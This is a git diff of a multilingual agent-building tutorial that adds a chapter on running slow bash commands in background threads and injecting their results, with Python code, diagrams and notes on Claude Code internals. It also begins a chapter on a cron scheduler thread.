次のステップ + +バックグラウンドタスクは「遅い操作がブロックしない」問題を解決した。しかし、何かを**定期的に**実行したい場合はどうする? 例えば「毎朝 9 時にテスト実行」「5 分ごとにサーバーステータスをチェック」? + +s14 Cron Scheduler → Agent にアラームを取り付ける。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `query.ts`(211, 1054-1060, 1411-1482 行)、`services/toolUseSummary/toolUseSummaryGenerator.ts`(L15 プロンプトテキスト)、`LocalShellTask.tsx`(L24-25 定数, L59-98 ウォッチドッグロジック)、`messageQueueManager.ts`(通知キュー)、`utils/task/framework.ts`(L267 `enqueueTaskNotification`)の完全分析に基づく。 + +### 一、pendingToolUseSummary:Haiku のバックグラウンド生成 + +CC はツール実行の各バッチ完了後、**Haiku side-query** を起動してツール使用要約を生成する。呼び出しコードは `query.ts:1411-1482`、プロンプトテキストは `services/toolUseSummary/toolUseSummaryGenerator.ts:15`(変数名 `TOOL_USE_SUMMARY_SYSTEM_PROMPT`)に定義。指示は "Write a short summary label... think git-commit-subject, not sentence" — 過去形、約 30 文字。 + +Haiku 要約(~1s)はメインモデルのストリーミング生成(5-30s)中に完了。次ラウンド開始前に、要約を yield。SDK はこの要約を消費してモバイル版の進捗表示に使用。 + +### 二、スレッドモデル:本当のスレッドはない + +CC は Node.js/Bun のシングルスレッドイベントループ上で動作する。「バックグラウンド」とは単に「await しない」こと。`ShellCommand.background(taskId)` は stdout/stderr をファイルにリダイレクトし、プロセスを独立して実行させる。 + +### 三、7 種のバックグラウンドタスクタイプ + +CC は **7 種**のバックグラウンドタスク(`Task.ts:7-13`)を定義:`local_bash`、`local_agent`、`remote_agent`、`in_process_teammate`、`local_workflow`、`monitor_mcp`、`dream`。それぞれ独自の登録、ライフサイクル、通知機構を持つ。 + +### 四、通知注入:コマンドキュー + +バックグラウンドタスク完了後、`enqueueTaskNotification`(`utils/task/framework.ts:267`)または `enqueuePendingNotification`(`messageQueueManager.ts`)を通じて**共有コマンドキュー**にエンキュー。通知形式は構造化 XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +優先度は `next` > `later`(`messageQueueManager.ts`)。バックグラウンドタスクはデフォルトで `later`(ユーザー入力をブロックしない)。消費点は `query.ts:1566-1593`。 + +### 五、停滞ウォッチドッグ + +バックグラウンド bash タスクにはウォッチドッグがある(`LocalShellTask.tsx` L24-25 定数, L59-98 ロジック) — 出力の停滞を定期的にチェックし、45 秒間増加がない場合にインタラクティブなプロンプト(`(y/n)` など)を検出。バックグラウンドタスクが応答待ちのインタラクティブダイアログでスタックするのを防止。 + +### 六、同時実行制限 + +フォアグラウンドツール呼び出し:`CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY`(デフォルト 10 個の同時実行安全ツール)。バックグラウンド bash タスク:ハードリミットなし — それらは独立したサブプロセス。 + +
+ + diff --git a/s13_background_tasks/README.md b/s13_background_tasks/README.md new file mode 100644 index 000000000..ea6d3307d --- /dev/null +++ b/s13_background_tasks/README.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — 慢操作放后台,Agent 继续思考 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... → s19 +> *"慢操作丢后台, agent 继续思考"* — 后台线程跑命令, 完成后注入通知。 +> +> **Harness 层**: 后台 — 异步执行, 不阻塞思考。 + +--- + +## 问题 + +你用过洗衣机吗?把衣服扔进去,按下启动,然后去干别的——做饭、回消息、看论文。30 分钟后洗衣机"滴滴滴"提醒你:好了。你不会站在洗衣机前面干等 30 分钟。 + +Agent 的 bash 工具也一样。`pip install torch` 要 10 分钟,`npm run build` 要 3 分钟。这些命令一跑,Agent 就在等 bash 工具返回——它没法利用这段时间规划下一步、处理别的任务。 + +读文件是毫秒级,不等。`git status` 一秒内返回,不等。但 `npm install`?分钟级。Agent 等 10 分钟,什么都不做。**同步执行让 Agent 在慢操作上浪费了本可以用来思考和规划的时间。** + +--- + +## 解决方案 + +![Background Tasks Overview](images/background-tasks-overview.svg) + +s12 的循环、任务系统、prompt 组装全部保留。唯一的变动:慢操作扔到后台线程,Agent 继续跑循环,后台完成后把结果注入到对话里。 + +同步 vs 后台: + +| | 同步 (s12) | 后台 (s13) | +|---|---|---| +| 慢操作 | Agent 干等 | 后台线程执行 | +| Agent 空闲 | 是 | 否,继续思考 | +| 结果 | 立即返回 | 下轮注入通知 | +| 判断标准 | — | `is_slow_operation` 启发式 | + +--- + +## 工作原理 + +### is_slow_operation: 快慢判断 + +不是所有操作都放后台。读文件、`git status` 这些毫秒级操作,同步执行比开线程更快。只有**可能超过 30 秒**的操作才值得丢后台: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +教学版用关键词启发式。CC 的判断更精细——看命令的预期执行时间、历史运行时间、甚至用户配置的超时阈值。 + +### run_in_background: 后台执行 + +把工具调用包装成一个 worker 函数,扔到 `threading.Thread(daemon=True)` 里执行。结果存到 `background_results` 字典,用 `threading.Lock` 保护: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` 确保 Agent 进程退出时线程跟着退出,不会卡住。 + +### collect_background_results: 收集结果 + +每轮循环结束时,检查后台任务有没有完成的: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +把完成的结果清出字典,返回给调用方。没完成的——下轮再检查。 + +### 循环中的集成 + +agent_loop 里,工具执行分两条路: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# 注入已完成的后台结果 +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +慢操作先回一个占位符 `[Running in background...]`,LLM 知道这个命令还在跑,可以先做别的事。后台完成后,结果作为新的 `tool_result` 注入到 messages 里——LLM 下一轮就能看到。 + +### 合起来跑 + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." + +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! inject result + → LLM sees both: config file + install result +``` + +Agent 没干等——npm install 跑后台的时候,它去读了配置文件。 + +--- + +## 相对 s12 的变更 + +| 组件 | 之前 (s12) | 之后 (s13) | +|------|-----------|-----------| +| 执行模型 | 全部同步 | 慢操作后台线程 + 通知注入 | +| 新模块 | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| 新类型 | — | `background_results: dict`, `background_lock: Lock` | +| 循环行为 | 工具串行执行 | 慢操作异步,快操作同步,结果每轮收集 | +| 占位符 | — | `[Running in background...]` | +| 工具 | 7 (s12) | 7(不变,执行策略变了) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +试试这些 prompt: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +观察重点:慢操作(pip/npm)有没有被送到后台?Agent 有没有在等的同时做别的事?后台结果有没有被注入回来? + +--- + +## 接下来 + +后台任务解决了"慢操作不阻塞"。但如果想**定时**做某件事呢?比如"每天早上 9 点跑测试"、"每 5 分钟检查一次服务器状态"? + +s14 Cron Scheduler → 给 Agent 装一个闹钟。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `query.ts`(211, 1054-1060, 1411-1482 行)、`services/toolUseSummary/toolUseSummaryGenerator.ts`(L15 prompt 文本)、`LocalShellTask.tsx`(L24-25 常量, L59-98 看门狗逻辑)、`messageQueueManager.ts`(通知队列)、`utils/task/framework.ts`(L267 `enqueueTaskNotification`)的完整分析。 + +### 一、pendingToolUseSummary:Haiku 后台生成 + +CC 在每批工具执行完后,启动一个**Haiku side-query** 生成工具使用摘要。发起代码在 `query.ts:1411-1482`,prompt 文本定义在 `services/toolUseSummary/toolUseSummaryGenerator.ts:15`(变量名 `TOOL_USE_SUMMARY_SYSTEM_PROMPT`)。提示是 "Write a short summary label... think git-commit-subject, not sentence"——过去时态,约 30 字符。 + +Haiku 摘要(~1s)在主模型流式生成(5-30s)期间完成。下一轮开始前,把摘要 yield 出去。SDK 消费这些摘要做移动端进度展示。 + +### 二、线程模型:没有真正的线程 + +CC 运行在 Node.js/Bun 单线程事件循环中。"后台"只是 "不 await"。`ShellCommand.background(taskId)` 把 stdout/stderr 重定向到文件,让进程独立运行。 + +### 三、七种后台任务类型 + +CC 定义了 **7 种**后台任务(`Task.ts:7-13`):`local_bash`、`local_agent`、`remote_agent`、`in_process_teammate`、`local_workflow`、`monitor_mcp`、`dream`。每种有自己的注册、生命周期和通知机制。 + +### 四、通知注入:命令队列 + +后台任务完成后通过 `enqueueTaskNotification`(`utils/task/framework.ts:267`)或 `enqueuePendingNotification`(`messageQueueManager.ts`)入队到**共享命令队列**。通知格式是结构化的 XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +优先级分 `next` > `later`(`messageQueueManager.ts`)。后台任务默认 `later`(不阻塞用户输入)。消费点在 `query.ts:1566-1593`。 + +### 五、停滞看门狗 + +后台 bash 任务有一个看门狗(`LocalShellTask.tsx` L24-25 常量, L59-98 逻辑)——定期检查输出是否停滞,45 秒无增长后检测交互式提示(`(y/n)` 等),防止后台任务卡在无人响应的交互式对话框。 + +### 六、并发限制 + +前台工具调用:`CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY`(默认 10 个并发安全工具)。后台 bash 任务:没有硬性限制——它们是独立的子进程。 + +
+ + diff --git a/s13_background_tasks/code.py b/s13_background_tasks/code.py new file mode 100644 index 000000000..2d8ed345c --- /dev/null +++ b/s13_background_tasks/code.py @@ -0,0 +1,418 @@ +#!/usr/bin/env python3 +""" +s13: Background Tasks — thread-based async execution + notification injection. + +Run: python s13_background_tasks/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s12: + - threading.Thread for background execution + - background_results dict + threading.Lock for thread-safe storage + - is_slow_operation: heuristic (timeout > 30s → background) + - run_in_background: dispatch to daemon thread + - collect_background_results: gather completed results, clear dict + - agent_loop: slow ops → background + placeholder, then inject results + +ASCII flow: + messages → prompt → LLM → [slow?] → background thread → placeholder + ↓ ↓ (done) + ← collect results ← inject tool_result + [fast?] → sync execute → tool_result → loop +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress (owner: {owner})\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + print(f" \033[33m[unblocked] {', '.join(unblocked)}\033[0m") + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read_file, write_file, " + "create_task, list_tasks, claim_task, complete_task.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use create_task to break work " + "into subtasks with blockedBy dependencies.", + "skills": "Skills are available on demand.", + "memory": "Relevant memories from previous sessions are provided below.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, +} + + +# ── Background Tasks (s13 new) ── + +SLOW_THRESHOLD_S = 30 + +background_results: dict[str, str] = {} +background_lock = threading.Lock() +_background_threads: dict[str, threading.Thread] = {} + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + """Heuristic: commands likely to take > 30s go to background.""" + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) + + +def execute_tool(block) -> str: + """Execute a tool call block, return output.""" + handler = TOOL_HANDLERS.get(block.name) + if handler: + return handler(**block.input) + return f"Unknown tool: {block.name}" + + +def run_in_background(tool_use_id: str, fn, *args): + """Run fn in a daemon thread, store result in background_results.""" + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + _background_threads[tool_use_id] = thread + thread.start() + print(f" \033[33m[background] dispatched to thread {tool_use_id[:12]}...\033[0m") + + +def collect_background_results() -> dict[str, str]: + """Collect completed background results, clear from dict.""" + with background_lock: + ready = dict(background_results) + background_results.clear() + if ready: + for tid in ready: + print(f" \033[32m[background done] {tid[:12]}... " + f"({len(ready[tid])} chars)\033[0m") + return ready + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + # Slow operation → background thread + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...] " + f"Dispatched to background thread. " + f"I'll check the result next turn."}) + else: + # Fast operation → synchronous + output = execute_tool(block) + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject completed background results + bg_results = collect_background_results() + if bg_results: + bg_content = [] + for tid, output in bg_results.items(): + bg_content.append({"type": "tool_result", + "tool_use_id": tid, + "content": output}) + messages.append({"role": "user", "content": bg_content}) + print(f" \033[32m[inject] {len(bg_content)} background " + f"result(s) injected\033[0m") + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s13: background tasks") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms13 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s13_background_tasks/images/background-tasks-overview.en.svg b/s13_background_tasks/images/background-tasks-overview.en.svg new file mode 100644 index 000000000..830ffb90e --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.en.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — Slow ops to background, Agent keeps thinking + + + + s12 retained + + s13 new + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → sync execute (s12) + slow? → run_in_background ★ + + + + + + + Background thread execution + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + result → background_results[id] (threading.Lock protected) + + + + slow op + + + + Notification injection + collect_background_results() check each turn + completed → tool_result inject into messages + pending → "[Running in background...]" placeholder + + + + + + + Heuristic: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 sync blocking + + think + + waiting for bash 3min... + + continue + Total ~3min, Agent idled for 3 minutes + + + s13 background execution + + think + + keep doing other work + + notification: result ready + Total ~3min, but Agent wasn't idle + \ No newline at end of file diff --git a/s13_background_tasks/images/background-tasks-overview.ja.svg b/s13_background_tasks/images/background-tasks-overview.ja.svg new file mode 100644 index 000000000..207eec47b --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.ja.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — 遅い操作はバックグラウンドへ、Agent は考え続ける + + + + s12 維持 + + s13 新規 + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → 同期実行 (s12) + slow? → run_in_background ★ + + + + + + + バックグラウンドスレッド実行 + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + 結果 → background_results[id] (threading.Lock で保護) + + + + slow op + + + + 通知注入 + collect_background_results() 毎ターン確認 + 完了 → tool_result を messages に注入 + 未完了 → "[Running in background...]" プレースホルダー + + + + + + + ヒューリスティック判定: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 同期ブロッキング + + 思考 + + bash 待ち 3分... + + 継続 + 合計 ~3分、Agent は3分間待機 + + + s13 バックグラウンド実行 + + 思考 + + 別の作業を継続 + + 通知: 結果完了 + 合計 ~3分、Agent は遊ばず + diff --git a/s13_background_tasks/images/background-tasks-overview.svg b/s13_background_tasks/images/background-tasks-overview.svg new file mode 100644 index 000000000..ac6dff0ac --- /dev/null +++ b/s13_background_tasks/images/background-tasks-overview.svg @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + + + + + + Background Tasks — 慢操作丢后台,Agent 继续思考 + + + + s12 保留 + + s13 新增 + + + + messages + + + + + prompt + cache + (s10-s12) + + + + + LLM call + (s11 retry) + + + + + + TOOL DISPATCH + fast? → 同步执行 (s12) + slow? → run_in_background ★ + + + + + + + 后台线程执行 + run_in_background(tool_use_id, fn, *args) + threading.Thread(target=worker, daemon=True) + 结果 → background_results[id] (threading.Lock 保护) + + + + slow op + + + + 通知注入 + collect_background_results() 每轮检查 + 已完成 → tool_result 注入 messages + 未完成 → "[Running in background...]" 占位 + + + + + + + 启发式判断: + + fast + read_file · git status · glob + + slow + npm install · pip install · pytest (timeout > 30s) + + + + s12 同步阻塞 + + 思考 + + 等 bash 3 分钟... + + 继续 + 总耗时 ~3min,Agent 空 etc. 等了 3 分钟 + + + s13 后台执行 + + 思考 + + 继续做别的事 + + 通知: 结果来了 + 总耗时 ~3min,但 Agent 没闲着 + diff --git a/s14_cron_scheduler/README.en.md b/s14_cron_scheduler/README.en.md new file mode 100644 index 000000000..e35a0f3e1 --- /dev/null +++ b/s14_cron_scheduler/README.en.md @@ -0,0 +1,263 @@ +# s14: Cron Scheduler — Fire on schedule, no human pushing needed + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s12 → s13 → `s14` → [s15](../s15_agent_teams/) → s16 → ... → s19 +> *"Fire on schedule, no human pushing needed"* — cron scheduling, durable or session-level. +> +> **Harness layer**: Scheduling — Agent acts on its own timetable. + +--- + +## The Problem + +An alarm clock doesn't need you watching it to go off. You set it for 7:00 AM, and it rings on its own — whether you're sleeping, showering, or cooking, it rings regardless. + +s13 lets the Agent execute slow operations in the background — but every operation is still manually triggered by you. You say something, the Agent does something. "Run tests every morning at 9 AM", "Check CI status every 30 minutes" — these recurring tasks shouldn't require a human to push them each time. + +--- + +## The Solution + +![Cron Scheduler Overview](images/cron-scheduler-overview.en.svg) + +s13's background threads, task system, and prompt assembly are fully preserved. The addition: **a standalone cron scheduler thread** — running in a daemon thread, polling every second, and queuing matching jobs into `cron_queue`. The Agent's main loop consumes triggered jobs from the queue and injects them into the conversation. + +Manual vs. Scheduled: + +| | Manual Trigger (s13) | Scheduled Trigger (s14) | +|---|---|---| +| Triggered by | User input | Scheduler thread, automatically | +| Trigger timing | Anytime | Specified by cron expression | +| Human involvement required | Yes | No | +| Persistence | — | Durable, survives restarts | + +--- + +## How It Works + +### CronJob: Data Structure + +Each cron task is a `CronJob` object: + +```python +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" (5-field cron expression) + prompt: str # Message injected to the Agent when triggered + recurring: bool # True=recurring, False=one-shot + durable: bool # True=write to disk, persists across sessions +``` + +Cron expressions — 5-field, the format Unix has used for 50 years: + +``` +Minute Hour Day Month Day-of-week + * * * * * Every minute + 0 9 * * * Every day at 9:00 AM + */5 * * * * Every 5 minutes + 0 9 * * 1-5 Weekdays at 9:00 AM +``` + +Supports `*`, `*/N`, `N`, `N-M`, `N,M,...`. + +### cron_matches: 5-Field Matching + +Each polling cycle compares the current time against every job's cron expression: + +```python +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + dow_val = (dt.weekday() + 1) % 7 # Python Monday=0 → cron Sunday=0 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) +``` + +Field-by-field matching — all 5 fields must pass for a match. + +### Standalone Scheduler Thread: Polling Every Second + +**This is the biggest difference from previous chapters**: the scheduler runs in its own daemon thread, independent of whether `agent_loop` is executing: + +```python +def cron_scheduler_loop(): + """Independent daemon thread: poll every 1s, fire matching jobs.""" + while True: + time.sleep(1) + now = datetime.now() + minute_marker = now.hour * 60 + now.minute + with cron_lock: + for job in list(scheduled_jobs.values()): + if cron_matches(job.cron, now): + if _last_fired.get(job.id) != minute_marker: + cron_queue.append(job) + _last_fired[job.id] = minute_marker + if not job.recurring: + scheduled_jobs.pop(job.id, None) + if job.durable: + save_durable_jobs() + +threading.Thread(target=cron_scheduler_loop, daemon=True).start() +``` + +Key design decisions: +- **Independent of agent_loop**: The scheduler runs in the background even when the user isn't typing +- **minute_marker prevents duplicates**: Fires at most once per minute (1-second polling × 60 checks = 60 polls, but cron granularity is per-minute) +- **One-shot jobs**: Automatically removed from `scheduled_jobs` after firing + +### agent_loop: Consumer Side + +`agent_loop` doesn't check the time — it only pulls triggered jobs from `cron_queue` and injects them into messages: + +```python +# Before each LLM call, consume triggered cron jobs +fired = consume_cron_queue() +for job in fired: + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) +``` + +The producer (scheduler thread) and consumer (agent_loop) are decoupled via `cron_queue` + `cron_lock` — the threading pattern from s13, applied directly. + +### Durable vs. Session-only + +- **Durable**: The task definition is written to `.scheduled_tasks.json`. When the Agent restarts, it loads the file and restores the tasks. +- **Session-only**: Lives only in memory. Gone when the Agent exits. + +The Agent decides for itself — "this scheduled task only needs to run today" → session-only; "run tests every morning" → durable. + +> **Important caveat**: The cron scheduler is not the same as OS-level crontab. **It must run inside the Agent process** — if the process shuts down, scheduling stops too. Durable only means the task definition survives restarts — the next time the Agent starts up, the scheduler discovers "this should have fired" and triggers it. If you need tasks that fire even when the application is closed, use system crontab or systemd timers. + +### Putting It All Together + +``` +1. On startup: + load_durable_jobs() → restore durable tasks from .scheduled_tasks.json + Thread(cron_scheduler_loop, daemon=True).start() → scheduler thread begins polling + +2. Register a task: + schedule_cron(cron="*/2 * * * *", prompt="run date", durable=True) + → CronJob written to scheduled_jobs + .scheduled_tasks.json + +3. Every 2 minutes: + Scheduler thread checks → cron_matches returns True → cron_queue.append(job) + → agent_loop next iteration calls consume_cron_queue → injects 